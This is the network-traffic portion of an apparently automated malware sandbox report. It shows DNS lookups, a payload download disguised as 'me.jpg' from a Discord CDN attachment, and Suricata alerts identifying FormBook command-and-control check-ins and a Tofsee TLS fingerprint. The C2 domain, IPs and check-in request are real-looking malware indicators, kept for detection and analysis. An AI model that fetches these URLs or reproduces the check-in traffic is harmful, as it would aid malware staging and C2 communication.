Network Analysis
| Name | Response | Post-Analysis Lookup |
|---|---|---|
| www.hughesconsulting.agency | 198.54.117.212 | |
| www.856380176.xyz | 103.88.34.80 | |
| cdn.discordapp.com | 162.159.129.233 | |
| google.com | 172.217.175.78 |
- UDP Requests
-
-
192.168.56.101:54056 164.124.101.2:53
-
192.168.56.101:55450 164.124.101.2:53
-
192.168.56.101:59369 164.124.101.2:53
-
192.168.56.101:61479 164.124.101.2:53
-
192.168.56.101:62324 164.124.101.2:53
-
192.168.56.101:137 192.168.56.255:137
-
192.168.56.101:138 192.168.56.255:138
-
192.168.56.101:49152 239.255.255.250:3702
-
192.168.56.101:62325 239.255.255.250:3702
-
192.168.56.101:62445 239.255.255.250:1900
-
192.168.56.101:62447 239.255.255.250:3702
-
52.231.114.183:123 192.168.56.101:123
-
GET
0
https://cdn.discordapp.com/attachments/858793322087710753/863898136854003722/me.jpg
REQUEST
RESPONSE
BODY
GET /attachments/858793322087710753/863898136854003722/me.jpg HTTP/1.1
Accept: */*
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Host: cdn.discordapp.com
Connection: Keep-Alive
GET
0
http://www.hughesconsulting.agency/jn7g/?RzuPnV=ajcMCBFDYNrcQR4M5/AD8FiopJRVDH4Khp6kfbop7hPsk3lSAcKT1amqvir1ji1uf6qUYpWI&QL3=uTyXxNyxQZxHE
REQUEST
RESPONSE
BODY
GET /jn7g/?RzuPnV=ajcMCBFDYNrcQR4M5/AD8FiopJRVDH4Khp6kfbop7hPsk3lSAcKT1amqvir1ji1uf6qUYpWI&QL3=uTyXxNyxQZxHE HTTP/1.1
Host: www.hughesconsulting.agency
Connection: close
ICMP traffic
| Source | Destination | ICMP Type | Data |
|---|---|---|---|
| 192.168.56.101 | 216.58.220.206 | 8 | abcdefghijklmnopqrstuvwabcdefghi |
| 216.58.220.206 | 192.168.56.101 | 0 | abcdefghijklmnopqrstuvwabcdefghi |
IRC traffic
No IRC requests performed.
Suricata Alerts
| Flow | SID | Signature | Category |
|---|---|---|---|
| TCP 192.168.56.101:49201 -> 162.159.134.233:443 | 906200056 | SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) | undefined |
| TCP 192.168.56.101:49204 -> 198.54.117.212:80 | 2031412 | ET MALWARE FormBook CnC Checkin (GET) | Malware Command and Control Activity Detected |
| TCP 192.168.56.101:49204 -> 198.54.117.212:80 | 2031449 | ET MALWARE FormBook CnC Checkin (GET) | Malware Command and Control Activity Detected |
| TCP 192.168.56.101:49204 -> 198.54.117.212:80 | 2031453 | ET MALWARE FormBook CnC Checkin (GET) | Malware Command and Control Activity Detected |
Suricata TLS
| Flow | Issuer | Subject | Fingerprint |
|---|---|---|---|
|
TLSv1 192.168.56.101:49201 162.159.134.233:443 |
C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2 | C=US, ST=CA, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com | a6:26:df:21:b9:4f:a7:fb:ae:8d:87:ce:fb:7d:2b:c6:50:8b:ff:da |
Snort Alerts
No Snort Alerts